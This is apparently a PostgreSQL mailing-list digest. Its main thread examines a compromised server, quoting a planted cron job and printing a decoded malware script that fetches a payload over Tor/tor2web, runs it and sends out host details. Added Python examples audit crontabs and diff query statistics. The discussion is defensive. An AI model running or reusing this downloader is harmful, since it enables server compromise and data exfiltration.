Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

2023-01-02 Thread Julien Rouhaud
On Mon, Jan 02, 2023 at 08:53:32AM +0200, Antonis Christodoulou wrote:
> And for the record, Ahmet, here’s a weird cron job:
>
> christan@vultr:~$ sudo crontab -l -u postgres
> 13 * * * * /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &
>
> Had no idea somebody can add something like this externally...

Just to be clear, having a superuser connection is basically the same as having
a shell open on the server running with the postgres (or the OS user running
the postgres service) user.  If your postgres OS user is a member of the cron
group it can add its own entry easily, the rest being stored in a
postgres-owned directory.
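
A defender-side check for the persistence pattern discussed above, as an added example that is not part of the original message: it flags crontab entries that run a hidden file from the service account's own directory with output discarded, and scripts that pipe base64-decoded data into a shell. The function names, the home path default and the sample input are assumptions constructed from what is quoted in this thread.

```python
import posixpath
import re

# Decoded data piped straight into a shell, as in the script quoted in the thread.
DECODE_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\b[^|\n]*\|\s*(?:ba|da|z)?sh\b")

def cron_command(line):
    """Return the command part of a user-crontab line, or None if it has none."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"[A-Za-z_]\w*\s*=", line):
        return None                                  # blank, comment, VAR=value
    special = line.startswith("@")                   # @reboot, @hourly, ...
    parts = line.split(None, 1 if special else 5)
    return parts[-1] if len(parts) == (2 if special else 6) else None

def audit_crontab(text, home="/var/lib/postgresql"):
    """List (command, reasons) for entries that look like planted persistence."""
    findings = []
    for line in text.splitlines():
        command = cron_command(line)
        if command is None:
            continue
        program = command.split()[0]
        reasons = []
        if posixpath.basename(program).startswith("."):
            reasons.append("hidden executable")
        if posixpath.normpath(program).startswith(home.rstrip("/") + "/"):
            reasons.append("runs from the service account's own directory")
        if re.search(r">\s*/dev/null", command):
            reasons.append("output discarded")
        if command.rstrip().endswith("&"):
            reasons.append("backgrounded")
        if len(reasons) >= 2:                        # one trait alone is common
            findings.append((command, reasons))
    return findings

def decodes_into_shell(script_text):
    """True if a script pipes base64-decoded data into a shell interpreter."""
    return bool(DECODE_TO_SHELL.search(script_text))

# Constructed input: the crontab entry and script shape quoted in this thread,
# plus one ordinary maintenance job; PAYLOAD stands in for the encoded blob.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
30 2 * * * /usr/bin/vacuumdb --all --analyze
13 * * * * /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &
"""
SAMPLE_SCRIPT = "#!/bin/bash\nexec &>/dev/null\necho PAYLOAD|base64 -d|bash\n"

if __name__ == "__main__":
    for command, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(command, "->", ", ".join(reasons))
    print("decodes into shell:", decodes_into_shell(SAMPLE_SCRIPT))
```

On a live host the input would be the output of `crontab -l -u postgres` and the contents of any script it references.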




Re: Exact same output - pg_stat_statements

2023-01-02 Thread Julien Rouhaud
On Mon, Jan 02, 2023 at 02:34:13PM +0100, hubert depesz lubaczewski wrote:
> On Fri, Dec 30, 2022 at 11:04:59AM -0500, Rushikesh socha wrote:
> > Hi, Whenever I am running the below query on one of my Azure PostgreSQL
> > PaaS instances I am getting exact same output. I feel it shows old
> > information but as far as i know pg_stat_statements only shows current
> > information and not past right ? It may be a bug?
>
> pg_stat_statements has all the data since last reset of stats.
>
> So if you never reset stats, it accumulated data for however long you
> are using pg.
>
> Not really surprising that top total-time uses are the same.
>
> If you want to sensibly use it you should call reset function every now
> and then.

Resetting the data adds some noticeable overhead as newly added entries will
need to generate a normalized query string and so on.  What most people do is
take regular snapshots of the pg_stat_statements (and other stats) views and
then compare the snapshots.  There are a few open source projects available
that do that.
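
The snapshot-and-compare approach described above, as an added example that is not part of the original message or of any of the projects it mentions: two copies of the view are diffed per statement, so the ranking reflects the interval rather than everything since the last reset. The column names are those of pg_stat_statements in PostgreSQL 13 and later (`total_time` in earlier releases); the helper names and all row values are constructed.

```python
def diff_snapshots(before, after):
    """Per-statement activity between two pg_stat_statements snapshots."""
    old = {(r["userid"], r["dbid"], r["queryid"]): r for r in before}
    deltas = []
    for row in after:
        key = (row["userid"], row["dbid"], row["queryid"])
        prev = old.get(key)
        # A missing or larger previous counter means the entry was created
        # (or reset / evicted and re-created) after the first snapshot, so
        # everything it now holds happened inside the interval.
        if prev is None or prev["calls"] > row["calls"]:
            calls, time_ms = row["calls"], row["total_exec_time"]
        else:
            calls = row["calls"] - prev["calls"]
            time_ms = row["total_exec_time"] - prev["total_exec_time"]
        if calls > 0:                                # skip idle statements
            deltas.append({"key": key, "query": row["query"], "calls": calls,
                           "total_exec_time": round(time_ms, 3)})
    return sorted(deltas, key=lambda d: d["total_exec_time"], reverse=True)

def make_row(queryid, query, calls, total_exec_time, userid=10, dbid=5):
    """Build one constructed snapshot row (hypothetical helper)."""
    return {"userid": userid, "dbid": dbid, "queryid": queryid,
            "query": query, "calls": calls, "total_exec_time": total_exec_time}

# Constructed snapshots taken some time apart; times are in milliseconds.
SNAP_1 = [make_row(101, "SELECT * FROM orders WHERE id = $1", 1_000_000, 9_000_000.0),
          make_row(202, "UPDATE stock SET qty = $1 WHERE sku = $2", 100, 2_000.0),
          make_row(404, "SELECT $1", 5, 1.0)]
SNAP_2 = [make_row(101, "SELECT * FROM orders WHERE id = $1", 1_000_010, 9_000_050.0),
          make_row(202, "UPDATE stock SET qty = $1 WHERE sku = $2", 600, 9_000.0),
          make_row(303, "DELETE FROM sessions WHERE expires < $1", 20, 300.0),
          make_row(404, "SELECT $1", 5, 1.0)]

if __name__ == "__main__":
    top = max(SNAP_2, key=lambda r: r["total_exec_time"])
    print("cumulative top:", top["queryid"])         # same statement every time
    for d in diff_snapshots(SNAP_1, SNAP_2):
        print(d["key"][2], d["calls"], d["total_exec_time"])
```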




Re: what kind of hash algorithm is used by hash_bytes()?

2023-01-02 Thread Julien Rouhaud
Hi,

On Tue, Jan 03, 2023 at 12:30:27AM +0800, jack...@gmail.com wrote:
> jack...@gmail.com
> --
> I can't understand the hash_bytes() func in 
> src/backend/access/hash/hashfunc.c, it's published by a paper or others?
> Can you give me some materials to study it in depth?

It's documented at the beginning of hashfn.c.




Re: what kind of hash algorithm is used by hash_bytes()?

2023-01-02 Thread Adrian Klaver

On 1/2/23 08:30, jack...@gmail.com wrote:

> jack...@gmail.com
> --
> I can't understand the hash_bytes() func in src/backend/access/hash/hashfunc.c,
> it's published by a paper or others?
> Can you give me some materials to study it in depth?



Check out the README in:

src/backend/access/hash/

--
Adrian Klaver
adrian.kla...@aklaver.com





what kind of hash algorithm is used by hash_bytes()?

2023-01-02 Thread jack...@gmail.com
jack...@gmail.com
--
I can't understand the hash_bytes() func in src/backend/access/hash/hashfunc.c, 
it's published by a paper or others?
Can you give me some materials to study it in depth?




Re: Exact same output - pg_stat_statements

2023-01-02 Thread hubert depesz lubaczewski
On Fri, Dec 30, 2022 at 11:04:59AM -0500, Rushikesh socha wrote:
> Hi, Whenever I am running the below query on one of my Azure PostgreSQL
> PaaS instances I am getting exact same output. I feel it shows old
> information but as far as i know pg_stat_statements only shows current
> information and not past right ? It may be a bug?

pg_stat_statements has all the data since last reset of stats.

So if you never reset stats, it accumulated data for however long you
are using pg.

Not really surprising that top total-time uses are the same.

If you want to sensibly use it you should call reset function every now
and then.

Best regards,

depesz





Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

2023-01-02 Thread Matthias Apitz
On Monday, January 02, 2023 at 11:54:53 +0300, Ebubekir Büyüktosun wrote:

> Hey Antonis,
>
> If you decode the below Base64 code, you will see the following bash
> script that is tried to execute on your machine;
>
> ...

Without analyzing the shell code in detail, this is clear evidence of an
attack. You must purge the full operating system and reinstall it from
scratch with better credentials of Linux and later PostgreSQL.

matthias
-- 
Matthias Apitz, ✉ g...@unixarea.de, http://www.unixarea.de/ +49-176-38902045
Public GnuPG key: http://www.unixarea.de/key.pub




Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

2023-01-02 Thread Ebubekir Büyüktosun
Hey Antonis,

If you decode the below Base64 code, you will see the following bash script that is tried to execute on your machine;

x8C8W8llVk0Rzccy9N0ggCOI2VBAc
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "4iucigxvlfx4vcqn5sordersaa3a3ztjcaoszptxxo5b3pbn6nlwsfad")

sockz() {
n=(dns.twnic.tw doh-ch.blahdns.com doh-de.blahdns.com doh-fi.blahdns.com doh-jp.blahdns.com doh.li doh.pub doh-sg.blahdns.com fi.doh.dns.snopyta.org dns.digitalsize.net)
p=$(echo "dns-query?name=relay.tor2socks.in")
q=${n[$((RANDOM%${#n[@]}))]}
s=$($c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1)
}

fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done

02.01.2023, 11:37, "Antonis Christodoulou" :
> Hey Matthias, here it is:
>
> christan@vultr:~$ sudo cat /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh
> #!/bin/bash
> exec &>/dev/null
> echo x8C8W8llVk0Rzccy9N0ggCOI2VBAc
> echo [base64 payload removed]|base64 -d|bash
>
>> On 2 Jan 2023, at 9:46 AM, Matthias Apitz wrote:
>>
>> On Monday, January 02, 2023 at 08:53:32 a.m. +0200, Antonis Christodoulou wrote:
>>
>>> And for the record, Ahmet, here’s a weird cron job:
>>>
>>> christan@vultr:~$ sudo crontab -l -u postgres
>>> 13 * * * * /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &
>>>
>>> Had no idea somebody can add something like this externally...
>>
>> Please post the content of this script.
>>
>> matthias
>> --
>> Matthias Apitz, ✉ g...@unixarea.de, http://www.unixarea.de/ +49-176-38902045
>> Public GnuPG key: http://www.unixarea.de/key.pub

Have a good working day
Best Regards

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

2023-01-02 Thread Antonis Christodoulou
Hey Matthias, here it is:

christan@vultr:~$ sudo cat /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh
#!/bin/bash
exec &>/dev/null
echo x8C8W8llVk0Rzccy9N0ggCOI2VBAc
echo [base64 payload removed]|base64 -d|bash

> On 2 Jan 2023, at 9:46 AM, Matthias Apitz  wrote:
> 
> On Monday, January 02, 2023 at 08:53:32 a.m. +0200, Antonis Christodoulou wrote:
> 
>> And for the record, Ahmet, here’s a weird cron job:
>> 
>> christan@vultr:~$ sudo crontab -l -u postgres
>> 13 * * * * /var/lib/postgresql/.systemd-private-x8C8W8llVk0Rzccy9N0ggCOI2VBAc.sh > /dev/null 2>&1 &
>> 
>> Had no idea somebody can add something like this externally...
> 
> Please post the content of this script.
> 
>   matthias
> 
> 
> -- 
> Matthias Apitz, ✉ g...@unixarea.de, http://www.unixarea.de/ +49-176-38902045
> Public GnuPG key: http://www.unixarea.de/key.pub